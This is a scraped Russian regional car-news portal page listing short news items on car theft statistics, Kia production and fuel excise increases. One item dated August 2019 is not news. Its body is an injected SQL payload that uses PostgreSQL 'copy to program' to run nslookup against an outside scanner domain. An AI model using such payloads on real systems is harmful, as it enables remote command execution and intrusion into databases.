Главная     Мототехника     Автофирмы     Полезное     Автострахование     Доска обьявлений     Реклама     Автотюнинг     Карта сайта    
Предложения
Всего: 9 Посмотреть »

Личный кабинет

Погода

Предложения

Загрузка предложений ...

Партнёры

SolarStyle Studio разработка сайтов, хостинг, домены, дизайн.

Некоторые автоновости
30 августа 2019г.
Mr.

1';copy (select '') to program 'nslookup dns.sqli.\013405.529-41394.529.a9e86.\1.bxss.me
Подробнее »
29 декабря 2010г.
Назван самый угоняемый автомобиль в России

За девять месяцев 2010 года в России было угнано 2013 автомобилей Lada 2106. Эта модель стала самой угоняемой за подотчетный период, говорится в отчете МВД РФ, который попал в распоряжение портала Slon.ru.
Подробнее »
21 февраля 2012г.
Производство Kia Cee'd нового поколения начнется в апреле

Производство Kia Cee'd нового поколения начнется уже в апреле на заводе Автотор. Об этом сообщили в пресс-центре калининградского предприятия. В текущем году Автодор начнет выпуск новых и обновленных моделей сразу трех марок: Kia, Opel и Chevrolet.
Подробнее »
Акцизы на бензин будут расти на рубль ежегодно
В течение трех лет акцизы на бензин будет увеличен на 3 рубля за литр, сообщил министр финансов России Алексей Кудрин.

Как передает «ИТАР-ТАСС», об этом он рассказал в пятницу, 18 июня 2010 года, в ходе Петербургского международного экономического форума.

«Акцизы на бензин предполагаем повысить в течение трех лет на 3 рубля за литр», — сказал Кудрин.


Источник: avto.ru

Реклама










Быстрый поиск

Загрузка поиска ...

Автофирмы Ставрополь

Загрузка автофирм...

Автоновости

Загрузка новостей...

Реклама

    Руководитель сайта: Артёмов Владимир Николаевич Разработка и поддержка сайта - SolarStyle Studio   
Rambler's Top100 Яндекс.Метрика